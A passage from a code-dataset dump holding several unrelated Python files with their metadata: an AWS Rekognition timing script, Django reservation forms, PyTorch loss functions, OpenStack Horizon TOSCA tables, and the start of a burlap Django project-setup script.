"usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 893, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 893, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 905, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 907, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 907, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 918, "usage_type": "call"}, {"api_name": 
"pandas.DataFrame", "line_number": 924, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 931, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 933, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 940, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 940, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 945, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 957, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 998, "usage_type": "call"}, {"api_name": "numpy.cross", "line_number": 1006, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 1036, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 1076, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1076, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1080, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1080, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 1082, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 1083, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 1085, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 1085, "usage_type": "name"}]} +{"seq_id": "645765159", "text": "from PIL import Image\nimport boto3\nimport time\nimport os\nimport json\n\nbase = os.getcwd()\nmanPhotoDir = os.path.join(base,'ver_3')\n#photo = '3.png'\nregion='eu-west-1'\n\n#with open(photo, 'rb') as source_image:\n# source_bytes = source_image.read()\nxVectors = [-50, 0, 50]\nyVectors = [100, 150, 200, 250, 300]\nsavedPhotos = [1, 2, 3, 4, 5, 6]\nphotosType = ['FrontOff1', 'FrontOff2', 'FrontOn1', 'FrontOn2', 'Back1', 'Back2']\nfileNames =list()\nprint('geting paths of files')\nfor y in yVectors:\n for x in xVectors:\n for photoNo in savedPhotos:\n fileNames.append(os.path.join(os.path.join(manPhotoDir, str(y) + '_' + str(x) ), str(photoNo) +'.bmp'))\nresultDictionary = dict.fromkeys(fileNames , '')\nformatTimes = list()\nprint('convert bmps to png')\nfor fName in fileNames:\n start_time = time.time()\n Image.open(fName).save(fName.replace('.bmp', '.png'))\n resultDictionary[fName]=str((time.time() - start_time)*1000)\n# formatTimes.append()\n#print(\"Times for coverting files\")\n#print(', '.join(str(x) for x in formatTimes))\nprint('sending requests')\nclient = boto3.client('rekognition')\nfor fName in fileNames:\n with open(fName.replace('.bmp', '.png'), 'rb') as source_image:\n source_bytes = source_image.read()\n start_time = time.time()\n response = client.detect_labels(Image={'Bytes': source_bytes}, MaxLabels = 3)\n resultDictionary[fName]+=';'+str((time.time() - start_time)*1000)+os.linesep+json.dumps(response)\nprint('saving responses')\na_file = open('results.json', 'w')\njson.dump(resultDictionary, a_file)\na_file.close()\n\n", "sub_path": "SJU_boto_recognition.py", "file_name": "SJU_boto_recognition.py", "file_ext": "py", "file_size_in_byte": 1575, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "os.getcwd", "line_number": 7, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 8, "usage_type": "call"}, {"api_name": "os.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": 
"time.time", "line_number": 28, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 29, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 29, "usage_type": "name"}, {"api_name": "time.time", "line_number": 30, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 35, "usage_type": "call"}, {"api_name": "time.time", "line_number": 39, "usage_type": "call"}, {"api_name": "time.time", "line_number": 41, "usage_type": "call"}, {"api_name": "os.linesep", "line_number": 41, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 41, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "414775620", "text": "import datetime\n\nfrom django.core.exceptions import ValidationError\nfrom django.forms import ModelForm, ModelMultipleChoiceField, forms, CheckboxSelectMultiple, DateInput, TextInput, \\\n BooleanField\nfrom django.db.models import Prefetch\nfrom django.template import defaultfilters\n\nfrom urnik.models import Oseba, Predmet, Ucilnica, Rezervacija\nfrom urnik.templatetags.tags import dan_tozilnik_mnozina\n\n\nclass PredmetModelMultipleChoiceField(ModelMultipleChoiceField):\n def label_from_instance(self, obj):\n return obj.opisno_ime()\n\n\nclass OsebeModelMultipleChoiceField(ModelMultipleChoiceField):\n def label_from_instance(self, obj):\n return obj.priimek_ime\n\n\nclass UcilniceModelMultipleChoiceField(ModelMultipleChoiceField):\n def label_from_instance(self, obj):\n return obj.oznaka\n\n\nclass KombiniranPogledForm(forms.Form):\n oseba = OsebeModelMultipleChoiceField(queryset=Oseba.objects.aktivni(), required=False)\n predmet = PredmetModelMultipleChoiceField(queryset=Predmet.objects.exclude(ime=\"\").prefetch_related('letniki'), required=False)\n\n\nclass RezevacijeForm(ModelForm):\n\n PREKRIVANJA = 'prekrivanja'\n\n osebe = OsebeModelMultipleChoiceField(queryset=Oseba.objects.all(),\n help_text='Osebe, ki si lastijo to rezervacijo. Te osebe bodo lahko rezervacijo '\n 'spreminjale, prikazala pa se bo tudi na njihovem tedenskem urniku.')\n ucilnice = UcilniceModelMultipleChoiceField(queryset=Ucilnica.objects.objavljene(),\n help_text='Izberite učilnice, ki jih želite rezervirati',\n widget=CheckboxSelectMultiple())\n predmeti = PredmetModelMultipleChoiceField(queryset=Predmet.objects.all(),\n required=False,\n help_text='Predmeti, povezani s to rezervacijo. Lahko pustite prazno. '\n 'Če izberete enega ali več predmetov, se bo rezervacija pokazala na tedenskem '\n 'urniku predmeta in vseh letnikov, ki predmet imajo.')\n use_required_attribute = False\n\n class Meta:\n model = Rezervacija\n fields = ['ucilnice', 'osebe', 'dan', 'dan_konca', 'od', 'do', 'opomba', 'predmeti']\n widgets = {\n 'dan': DateInput(attrs={'placeholder': 'npr. 15. 1. 2019', 'class': 'datepicker'}),\n 'dan_konca': DateInput(attrs={'placeholder': 'ponavadi prazno, lahko tudi npr. 17. 1. 2019', 'class': 'datepicker'}),\n 'opomba': TextInput(attrs={'placeholder': 'npr. 
\"sestanek raziskovalne skupine\", ali pa \"kolokvij ALG1\"'}),\n }\n\n def __init__(self, *args, **kwargs):\n dovoli_prekrivanja = kwargs.pop('dovoli_prekrivanja', None)\n super(RezevacijeForm, self).__init__(*args, **kwargs)\n if dovoli_prekrivanja:\n self.fields['ignoriraj_prekrivanja'] = BooleanField(\n required=False, initial=False,\n help_text='Zavedam se prekrivanj in vseeno želim rezervirati izbrane učilnice '\n 'v izbranih dnevih in urah.')\n\n def clean_dan(self):\n dan = self.cleaned_data['dan']\n if dan < datetime.date.today():\n raise ValidationError(\"Datum rezervacije mora biti v prihodnosti.\")\n return dan\n\n def clean(self):\n cleaned = super().clean()\n if self.errors:\n return cleaned\n\n od = cleaned.get('od')\n do = cleaned.get('do')\n if od >= do:\n self.add_error(None, ValidationError(\"Ura začetka rezervacije mora biti pred uro konca rezervacije.\"))\n\n dan = cleaned.get('dan')\n konec = cleaned.get('dan_konca')\n if konec:\n if dan == konec:\n self.cleaned_data['dan_konca'] = None\n elif dan > konec:\n self.add_error(None, ValidationError(\"Dan začetka rezervacije moda biti \"\n \"pred dnevom konca rezervacije.\"))\n ignoriraj = cleaned.get('ignoriraj_prekrivanja')\n if not ignoriraj:\n self._preveri_konflikte(cleaned)\n\n return self.cleaned_data\n\n def _preveri_konflikte(self, cleaned):\n from urnik.iskanik_konfliktov import IskalnikKonfliktov\n ucilnice = cleaned.get('ucilnice')\n dan = cleaned.get('dan')\n konec = cleaned.get('dan_konca') or dan\n od = cleaned.get('od')\n do = cleaned.get('do')\n iskalnik = IskalnikKonfliktov(ucilnice, dan, konec)\n iskalnik.dodaj_srecanja()\n iskalnik.dodaj_rezervacije(Rezervacija.objects.prihajajoce().prefetch_related(Prefetch('ucilnice', to_attr='seznam_ucilnic')))\n\n date_format = lambda d: defaultfilters.date(d, \"D, j. 
b\")\n for u in ucilnice:\n if u.dovoli_veckratno_rezervacijo:\n continue\n d = dan\n while d <= konec:\n konflikti = iskalnik.konflikti(u, d, od, do)\n for r in konflikti.rezervacije:\n oseba = r.osebe.all()[:1]\n self.add_error(None, ValidationError(\n 'Vaša rezervacija bi se prekrivala z rezervacijo osebe %(oseba)s %(dan)s '\n 'od %(od)i do %(do)i z razlogom %(razlog)s.',\n params={\n 'oseba': oseba[0] if oseba else 'neznan',\n 'dan': \"od {} do {}\".format(date_format(r.dan), date_format(r.dan_konca))\n if r.dan_konca else \"dne {}\".format(date_format(r.dan)),\n 'razlog': r.opomba,\n 'od': r.od,\n 'do': r.do,\n },\n code=RezevacijeForm.PREKRIVANJA,\n ))\n\n for s in konflikti.srecanja:\n self.add_error(None, ValidationError(\n 'Vaša rezervacija bi se prekrivala s predmetom %(predmet)s (%(semester)s), ki se izvaja '\n 'ob %(dan_v_tednu)s od %(od)i do %(do)i.',\n params={\n 'predmet': s.predmet,\n 'semester': s.semester,\n 'dan_v_tednu': dan_tozilnik_mnozina(s.dan),\n 'od': s.od,\n 'do': s.do,\n },\n code=RezevacijeForm.PREKRIVANJA,\n ))\n\n d += datetime.timedelta(days=1)\n", "sub_path": "urnik/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 6707, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.forms.ModelMultipleChoiceField", "line_number": 13, "usage_type": "name"}, {"api_name": "django.forms.ModelMultipleChoiceField", "line_number": 18, "usage_type": "name"}, {"api_name": "django.forms.ModelMultipleChoiceField", "line_number": 23, "usage_type": "name"}, {"api_name": "django.forms.forms.Form", "line_number": 28, "usage_type": "attribute"}, {"api_name": "django.forms.forms", "line_number": 28, "usage_type": "name"}, {"api_name": "urnik.models.Oseba.objects.aktivni", "line_number": 29, "usage_type": "call"}, {"api_name": "urnik.models.Oseba.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "urnik.models.Oseba", "line_number": 29, "usage_type": "name"}, {"api_name": "urnik.models.Predmet.objects.exclude", "line_number": 30, "usage_type": "call"}, {"api_name": "urnik.models.Predmet.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": "urnik.models.Predmet", "line_number": 30, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 33, "usage_type": "name"}, {"api_name": "urnik.models.Oseba.objects.all", "line_number": 37, "usage_type": "call"}, {"api_name": "urnik.models.Oseba.objects", "line_number": 37, "usage_type": "attribute"}, {"api_name": "urnik.models.Oseba", "line_number": 37, "usage_type": "name"}, {"api_name": "urnik.models.Ucilnica.objects.objavljene", "line_number": 40, "usage_type": "call"}, {"api_name": "urnik.models.Ucilnica.objects", "line_number": 40, "usage_type": "attribute"}, {"api_name": "urnik.models.Ucilnica", "line_number": 40, "usage_type": "name"}, {"api_name": "django.forms.CheckboxSelectMultiple", "line_number": 42, "usage_type": "call"}, {"api_name": "urnik.models.Predmet.objects.all", "line_number": 43, "usage_type": "call"}, {"api_name": "urnik.models.Predmet.objects", "line_number": 43, "usage_type": "attribute"}, {"api_name": "urnik.models.Predmet", "line_number": 43, "usage_type": "name"}, {"api_name": "urnik.models.Rezervacija", "line_number": 51, "usage_type": "name"}, {"api_name": "django.forms.DateInput", "line_number": 54, "usage_type": "call"}, {"api_name": "django.forms.DateInput", "line_number": 55, "usage_type": "call"}, {"api_name": "django.forms.TextInput", "line_number": 56, 
"usage_type": "call"}, {"api_name": "django.forms.BooleanField", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.date.today", "line_number": 70, "usage_type": "call"}, {"api_name": "datetime.date", "line_number": 70, "usage_type": "attribute"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 71, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 82, "usage_type": "call"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 90, "usage_type": "call"}, {"api_name": "urnik.iskanik_konfliktov.IskalnikKonfliktov", "line_number": 105, "usage_type": "call"}, {"api_name": "urnik.models.Rezervacija.objects.prihajajoce", "line_number": 107, "usage_type": "call"}, {"api_name": "urnik.models.Rezervacija.objects", "line_number": 107, "usage_type": "attribute"}, {"api_name": "urnik.models.Rezervacija", "line_number": 107, "usage_type": "name"}, {"api_name": "django.db.models.Prefetch", "line_number": 107, "usage_type": "call"}, {"api_name": "django.template.defaultfilters.date", "line_number": 109, "usage_type": "call"}, {"api_name": "django.template.defaultfilters", "line_number": 109, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 118, "usage_type": "call"}, {"api_name": "{'IskalnikKonfliktov': 'urnik.iskanik_konfliktov.IskalnikKonfliktov'}.PREKRIVANJA", "line_number": 129, "usage_type": "attribute"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 133, "usage_type": "call"}, {"api_name": "urnik.templatetags.tags.dan_tozilnik_mnozina", "line_number": 139, "usage_type": "call"}, {"api_name": "{'IskalnikKonfliktov': 'urnik.iskanik_konfliktov.IskalnikKonfliktov'}.PREKRIVANJA", "line_number": 143, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 146, "usage_type": "call"}]} +{"seq_id": "119458064", "text": "import torch.nn as nn\n\n\n\ndef cos_loss(x, y):\n return 2 - (x).mul(y).mean()\n\n\ndef l1_loss(x, y):\n return (x - y).abs().mean()\n\n\ndef l2_loss(x, y, age=True):\n if age: # 1/(M*N)\n loss = (x - y).pow(2)\n else: # 1/N\n loss = (x - y).pow(2).view(list(x.size())[0], -1).sum(dim=-1)\n\n return loss.mean()\n\n\nclass KL_Loss_AGE(nn.Module):\n \"\"\"\n Kullback–Leibler Loss for the AGE model\n \"\"\"\n\n def __init__(self, minimize):\n \"\"\"\n\n :param minimize: Boolean parameter to change between minimizing and maximizing the Loss.\n \"\"\"\n super(KL_Loss_AGE, self).__init__()\n self.minimize = minimize\n self.mean = 0\n self.var = 0\n self.M = 0\n\n def forward(self, z):\n # Input normalized z\n \"\"\"\n :param z: The input/output (depends on the occasion) in the latent dimensional space\n :return: The loss of the data\n \"\"\"\n self.M = list(z.size())[1] # size of latent space\n self.mean = z.mean(dim=0)\n self.var = z.var(dim=0, unbiased=False)\n kl_loss = -1 / 2 + ((self.mean.pow(2) + self.var) / 2 - self.var.sqrt().log()).mean()\n\n if not self.minimize:\n kl_loss *= -1\n\n return kl_loss\n\n\nclass KL_Loss_Intro(nn.Module):\n \"\"\"\n Kullback–Leibler Loss for the IntroVAE model\n \"\"\"\n\n def __init__(self, minimize):\n \"\"\"\n\n :param minimize: Boolean parameter to change between minimizing and maximizing the Loss.\n\n \"\"\"\n super(KL_Loss_Intro, self).__init__()\n self.minimize = minimize\n self.mean = 0\n self.var = 0\n self.M = 0\n self.N = 0\n\n def forward(self, mean, logvar):\n \"\"\"\n\n :param mean: The mean of the input in the latent space\n :param logvar: The variance of the 
input in the latent space (log-variance)\n        :return:\n        \"\"\"\n\n        # Input mean and variance of z\n        self.M, self.N = list(mean.size())\n        self.mean = mean\n        self.logvar = logvar\n        var = logvar.exp()\n        kl_loss = (-1 - self.logvar + self.mean.pow(2) + var).mul_(0.5).sum(dim=-1)\n        kl_loss = kl_loss.mean()\n\n        if not self.minimize:\n            kl_loss *= -1\n\n        return kl_loss\n", "sub_path": "loss_functions.py", "file_name": "loss_functions.py", "file_ext": "py", "file_size_in_byte": 2239, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.nn.Module", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "torch.nn.Module", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "22341126", "text": "# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n#\n# COPYRIGHT (C) NEC CORPORATION 2016\n\nimport logging\n\nfrom django.core.urlresolvers import reverse\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom horizon import messages\nfrom horizon import tables\nfrom openstack_dashboard.api import base\n\nfrom nec_portal.api.cloudify import Cloudify as cloudify_api\n\n\nLOG = logging.getLogger(__name__)\n\n\nclass ExecuteInstall(tables.BatchAction):\n    \"\"\"Execute install class\"\"\"\n    name = 'execute_install'\n    verbose_name = _('Execute Install')\n    policy_rules = ((\"tosca\", \"tosca:execution_install\"), )\n    classes = ('tosca_confirm',)\n\n    @staticmethod\n    def action_present(count):\n        return _('Execute Install')\n\n    @staticmethod\n    def action_past(count):\n        return _('Executed Install')\n\n    def action(self, request, object_id):\n        try:\n            cloudify_api(\n                url_for_orchestration=(\n                    base.url_for(request, 'orchestration')\n                ),\n                token_id=request.user.token.id\n            ).do_install(object_id)\n        except Exception as e:\n            LOG.error('TOSCA: Failed to start install. (%s)' % e)\n            messages.error(request, e.message)\n            raise Exception()\n\n\nclass ExecuteUninstall(tables.DeleteAction):\n    \"\"\"Execute uninstall class\"\"\"\n    name = 'execute_uninstall'\n    verbose_name = _('Execute Uninstall')\n    policy_rules = ((\"tosca\", \"tosca:execution_uninstall\"), )\n    classes = ('btn-danger',)\n\n    @staticmethod\n    def action_present(count):\n        return _('Execute Uninstall')\n\n    @staticmethod\n    def action_past(count):\n        return _('Executed Uninstall')\n\n    def delete(self, request, object_id):\n        try:\n            cloudify_api(\n                url_for_orchestration=(\n                    base.url_for(request, 'orchestration')\n                ),\n                token_id=request.user.token.id\n            ).do_uninstall(object_id)\n        except Exception as e:\n            LOG.error('TOSCA: Failed to uninstall. 
(%s)' % e)\n            messages.error(request, e.message)\n            raise Exception()\n\n\nclass DeleteDeployment(tables.DeleteAction):\n    \"\"\"Delete deployment class\"\"\"\n    name = 'delete_deployment'\n    success_url = 'horizon:project:tosca_deployments:index'\n    policy_rules = ((\"tosca\", \"tosca:deployment_delete\"), )\n\n    @staticmethod\n    def action_present(count):\n        return _('Delete Deployment')\n\n    @staticmethod\n    def action_past(count):\n        return _('Delete Deployment')\n\n    def delete(self, request, object_id):\n        try:\n            cloudify_api(\n                url_for_orchestration=(\n                    base.url_for(request, 'orchestration')\n                ),\n                token_id=request.user.token.id\n            ).delete_deployment(object_id)\n        except Exception as e:\n            LOG.error('TOSCA: Failed to delete deployment. (%s)' % e)\n            messages.error(request, e.message)\n            raise Exception()\n\n\nclass CancelExecution(tables.DeleteAction):\n    \"\"\"Cancel execution class\"\"\"\n    name = 'cancel_execution'\n    verbose_name = _('Cancel Execution')\n    force = False\n\n    @staticmethod\n    def action_present(count):\n        return _('Cancel Execution')\n\n    @staticmethod\n    def action_past(count):\n        return _('Canceled Execution')\n\n    def delete(self, request, object_id):\n        try:\n            cloudify_api(\n                url_for_orchestration=(\n                    base.url_for(request, 'orchestration')\n                ),\n                token_id=request.user.token.id\n            ).cancel_execution(object_id, self.force)\n        except Exception as e:\n            LOG.error('TOSCA: Failed to cancel. (%s)' % e)\n            messages.error(request, e.message)\n            raise Exception()\n\n    def allowed(self, request, object):\n        if object.status:\n            if object.status == 'cancelling':\n                self.force = True\n            if object.status in ['started', 'cancelling']:\n                return True\n        return False\n\n\ndef get_execution_link_url(deployment):\n    url = 'horizon:project:tosca_deployments:executions'\n    return reverse(url, args=[deployment.id])\n\n\ndef get_eventlog_link_url(execution):\n    url = 'horizon:project:tosca_deployments:eventlog'\n    return reverse(url, args=[execution.id])\n\n\nclass ToscaDeploymentTable(tables.DataTable):\n    \"\"\"Tosca Deployment Table class\"\"\"\n    deployment_name = tables.Column('id',\n                                    verbose_name=_('Deployment Name'),\n                                    link=get_execution_link_url)\n    template_name = tables.Column('template_id',\n                                  verbose_name=_('Template Name'))\n    created_at = tables.Column('created_at',\n                               verbose_name=_('Created At'))\n\n    def get_object_id(self, deployment):\n        return deployment.id\n\n    class Meta(object):\n        \"\"\"Meta class\"\"\"\n        name = 'tosca_deployment_list'\n        verbose_name = 'Deployments'\n\n        row_actions = (ExecuteInstall, ExecuteUninstall,\n                       DeleteDeployment,)\n        multi_select = False\n\n\nclass ToscaExecutionTable(tables.DataTable):\n    \"\"\"Tosca Execution Table class\"\"\"\n    id = tables.Column('id',\n                       verbose_name=_('Execution ID'),\n                       link=get_eventlog_link_url,\n                       sortable=False)\n    workflow_id = tables.Column('workflow_id',\n                                verbose_name=_('Workflow ID'),\n                                sortable=False)\n    status = tables.Column('status',\n                           verbose_name=_('Status'),\n                           sortable=False)\n    error = tables.Column('error',\n                          verbose_name=_('Error'),\n                          sortable=False)\n    created_at = tables.Column('created_at',\n                               verbose_name=_('Created At'),\n                               sortable=False)\n\n    def get_object_id(self, execution):\n        return execution.id\n\n    class Meta(object):\n        \"\"\"Meta class\"\"\"\n        name = 'tosca_deployment_list'\n        verbose_name = 'Deployments'\n\n        row_actions = (CancelExecution,)\n        multi_select = False\n", "sub_path": "nec_portal/dashboards/project/tosca_deployments/tables.py", "file_name": "tables.py", "file_ext": "py", "file_size_in_byte": 6785, "program_lang": "python", "lang": 
"en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "logging.getLogger", "line_number": 27, "usage_type": "call"}, {"api_name": "horizon.tables.BatchAction", "line_number": 30, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 30, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 33, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 39, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 43, "usage_type": "call"}, {"api_name": "nec_portal.api.cloudify.Cloudify", "line_number": 47, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base.url_for", "line_number": 49, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base", "line_number": 49, "usage_type": "name"}, {"api_name": "horizon.messages.error", "line_number": 55, "usage_type": "call"}, {"api_name": "horizon.messages", "line_number": 55, "usage_type": "name"}, {"api_name": "horizon.tables.DeleteAction", "line_number": 59, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 59, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 62, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 68, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 72, "usage_type": "call"}, {"api_name": "nec_portal.api.cloudify.Cloudify", "line_number": 76, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base.url_for", "line_number": 78, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base", "line_number": 78, "usage_type": "name"}, {"api_name": "horizon.messages.error", "line_number": 84, "usage_type": "call"}, {"api_name": "horizon.messages", "line_number": 84, "usage_type": "name"}, {"api_name": "horizon.tables.DeleteAction", "line_number": 88, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 88, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 96, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 100, "usage_type": "call"}, {"api_name": "nec_portal.api.cloudify.Cloudify", "line_number": 104, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base.url_for", "line_number": 106, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base", "line_number": 106, "usage_type": "name"}, {"api_name": "horizon.messages.error", "line_number": 112, "usage_type": "call"}, {"api_name": "horizon.messages", "line_number": 112, "usage_type": "name"}, {"api_name": "horizon.tables.DeleteAction", "line_number": 116, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 116, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 119, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 124, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 128, "usage_type": "call"}, {"api_name": "nec_portal.api.cloudify.Cloudify", "line_number": 132, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base.url_for", "line_number": 134, "usage_type": "call"}, {"api_name": "openstack_dashboard.api.base", "line_number": 134, "usage_type": "name"}, {"api_name": "horizon.messages.error", "line_number": 140, "usage_type": "call"}, {"api_name": 
"horizon.messages", "line_number": 140, "usage_type": "name"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 154, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 159, "usage_type": "call"}, {"api_name": "horizon.tables.DataTable", "line_number": 162, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 162, "usage_type": "name"}, {"api_name": "horizon.tables.Column", "line_number": 164, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 164, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 165, "usage_type": "call"}, {"api_name": "horizon.tables.Column", "line_number": 167, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 167, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 168, "usage_type": "call"}, {"api_name": "horizon.tables.Column", "line_number": 169, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 169, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 170, "usage_type": "call"}, {"api_name": "horizon.tables.DataTable", "line_number": 185, "usage_type": "attribute"}, {"api_name": "horizon.tables", "line_number": 185, "usage_type": "name"}, {"api_name": "horizon.tables.Column", "line_number": 187, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 187, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 188, "usage_type": "call"}, {"api_name": "horizon.tables.Column", "line_number": 191, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 191, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 192, "usage_type": "call"}, {"api_name": "horizon.tables.Column", "line_number": 194, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 194, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 195, "usage_type": "call"}, {"api_name": "horizon.tables.Column", "line_number": 197, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 197, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 198, "usage_type": "call"}, {"api_name": "horizon.tables.Column", "line_number": 200, "usage_type": "call"}, {"api_name": "horizon.tables", "line_number": 200, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 201, "usage_type": "call"}]} +{"seq_id": "107150061", "text": "from __future__ import print_function\n\nimport os\nimport re\n\nimport burlap\nfrom burlap import ContainerSatchel\nfrom burlap.constants import *\nfrom burlap.decorators import task\n\nfabfile_template = os.path.join(\n os.path.dirname(burlap.__file__),\n 'templates',\n 'burlap',\n 'fabfile.py.template',\n)\n\ndef md(d):\n if os.path.isdir(d):\n return\n os.makedirs(d)\n\ndef to_camelcase(value):\n value = re.sub(r'[^a-zA-Z0-9]+', ' ', value).strip()\n return ''.join(x.capitalize() for x in value.split(' '))\n\ndef init_dj(project_name, default_roles, virtualenv_dir='.env', version=None, **kwargs):\n\n site_name = project_name\n\n print('Installing Django...')\n if version:\n os.system('%s/bin/pip install Django==%s' % (virtualenv_dir, version))\n else:\n os.system('%s/bin/pip install Django' % virtualenv_dir)\n\n print('Initializing Django project...')\n if not os.path.isdir('src/%s' % site_name):\n 
print('Initializing base django project...')\n        os.system('. %s/bin/activate; django-admin.py startproject %s src; deactivate' % (virtualenv_dir, site_name,))\n        _settings_fn = os.path.abspath('src/%s/settings.py' % project_name)\n        _content = open(_settings_fn, 'r').read()\n        _sites = '''SITE_{name_upper} = \"{name_lower}\"\nSITES = (\n    SITE_{name_upper},\n)\n'''.format(\n            name_upper=project_name.upper(),\n            name_lower=project_name.lower(),\n        )\n        _top = []\n        for _role in default_roles:\n            _top.append(\"ROLE_%s = '%s'\" % (_role.upper(), _role.lower()))\n        _top.append('ROLES = (')\n        for _role in default_roles:\n            _top.append(\"    ROLE_%s,\" % (_role.upper(),))\n        _top.append(')')\n        _index = _content.find('\"\"\"\\n\\n')+4\n\n        bottom_args = dict(\n            app_name=project_name,\n            app_name_title=project_name.title() + ' Administration',\n            app_name_simple=project_name.title()\n        )\n        _bottom = '''\nPROJECT_DIR = os.path.abspath(os.path.join(os.path.split(__file__)[0], '..', '..'))\n\nSTATIC_ROOT = os.path.join(PROJECT_DIR, 'static')\n\nMEDIA_ROOT = os.path.join(PROJECT_DIR, 'media')\nMEDIA_URL = '/media/'\n\nSTATICFILES_FINDERS = (\n    'django.contrib.staticfiles.finders.FileSystemFinder',\n    'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\nTEMPLATE_LOADERS = (\n    